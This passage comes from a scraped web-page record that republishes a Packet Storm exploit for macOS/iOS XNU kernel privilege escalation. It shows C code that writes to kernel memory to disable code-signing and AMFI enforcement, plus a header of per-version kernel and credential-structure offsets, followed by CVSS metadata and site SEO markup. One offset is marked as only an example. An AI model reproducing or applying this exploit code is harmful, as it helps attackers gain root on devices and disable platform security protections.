\\u0026current_proc, sizeof(current_proc));\\n        }\\n        \\n        return 0;\\n    }\\n    \\n    void patch_codesign() {\\n        \/\/ Patch cs_enforcement_disable\\n        uint64_t cs_enforcement = kernel_base + CS_ENFORCEMENT;\\n        uint8_t zero = 0;\\n        kernel_write(cs_enforcement, \\u0026zero, sizeof(zero));\\n        \\n        \/\/ Patch amfi_enforce\\n        uint64_t amfi_enforce = kernel_base + AMFI_ENFORCE;\\n        uint32_t amfi_zero = 0;\\n        kernel_write(amfi_enforce, \\u0026amfi_zero, sizeof(amfi_zero));\\n        \\n        \/\/ Patch vm_map_enter check\\n        uint64_t vm_map_enter_check = kernel_base + 0x123456; \/\/ \u0645\u062b\u0627\u0644\\n        uint32_t nop = 0xD503201F; \/\/ NOP instruction\\n        kernel_write(vm_map_enter_check, \\u0026nop, sizeof(nop));\\n        \\n        printf(\\&#8221;[+] Code signature patches applied\\\\n\\&#8221;);\\n    }\\n    \\n    =================================\\n    offsets.h (kernel offsets by version):\\n    \\n    #ifndef OFFSETS_H\\n    #define OFFSETS_H\\n    \\n    \/\/ iOS 10.1.1 (14B100) &#8211; iPhone 6s\\n    #if defined(TARGET_IPHONE_6S_10_1_1)\\n    #define KERNEL_BASE          0xFFFFFFF007004000ULL\\n    #define KERNPROC_OFFSET      0x005AA0E0ULL\\n    #define ALLPROC_OFFSET       0x005A4128ULL\\n    #define REALHOST_OFFSET      0x005A8050ULL\\n    #define OSBoolean_True       0xFFFFFFF0070A9B78ULL\\n    #define OSBoolean_False      0xFFFFFFF0070A9B68ULL\\n    #define CS_ENFORCEMENT       0x003F7A18ULL\\n    #define AMFI_ENFORCE         0x004F3A00ULL\\n    \\n    \/\/ iOS 10.2 &#8211; iPhone 7\\n    #elif defined(TARGET_IPHONE_7_10_2)\\n    #define KERNEL_BASE          0xFFFFFFF007004000ULL\\n    #define KERNPROC_OFFSET      0x005B20E8ULL\\n    #define ALLPROC_OFFSET       0x005AB130ULL\\n    \/\/ &#8230; \u0625\u0644\u062e\\n    \\n    #endif\\n    \\n    \/\/ Structure offsets\\n    #define PROC_P_PID           0x60\\n    #define PROC_TASK            
0x10\\n    #define PROC_UCRED           0x100\\n    #define PROC_P_COMM          0x270\\n    #define PROC_P_NEXT          0x0\\n    \\n    #define TASK_ITK_SELF        0xD8\\n    #define TASK_BSD_INFO        0x358\\n    \\n    #define UCRED_CR_UID         0x18\\n    #define UCRED_CR_RUID        0x1C\\n    #define UCRED_CR_SVUID       0x20\\n    #define UCRED_CR_LABEL       0x78\\n    \\n    #endif \/\/ OFFSETS_H\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/213295&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.3,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;AV:N\/AC:M\/Au:N\/C:C\/I:C\/A:C&#8221;,&#8221;version&#8221;:&#8221;2.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;3.0&#8243;,&#8221;vectorString&#8221;:&#8221;CVSS:3.0\/AV:L\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;baseScore&#8221;:7.8,&#8221;baseSeverity&#8221;:&#8221;HIGH&#8221;,&#8221;attackVector&#8221;:&#8221;LOCAL&#8221;,&#8221;attackComplexity&#8221;:&#8221;LOW&#8221;,&#8221;privilegesRequired&#8221;:&#8221;NONE&#8221;,&#8221;userInteraction&#8221;:&#8221;REQUIRED
&#8221;,&#8221;scope&#8221;:&#8221;UNCHANGED&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;HIGH&#8221;,&#8221;integrityImpact&#8221;:&#8221;HIGH&#8221;,&#8221;availabilityImpact&#8221;:&#8221;HIGH&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/213295\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,55,12,15,13,53,7,11,5],"class_list":["post-32691","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=32691\" \/>\n<meta 
property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-24T16:34:18&#8243;,&#8221;description&#8221;:&#8221;This proof of concept targets a race\u2011condition vulnerability in the XNU kernel affecting macOS\/iOS. By forcing a use\u2011after\u2011free condition on kernel ports, the exploit manipulates...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=32691\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-24T11:45:16+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"18 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295\",\"datePublished\":\"2025-12-24T11:45:16+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691\"},\"wordCount\":3702,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32691#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691\",\"name\":\"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295 - zero 
redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-24T11:45:16+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32691\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 
redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->"}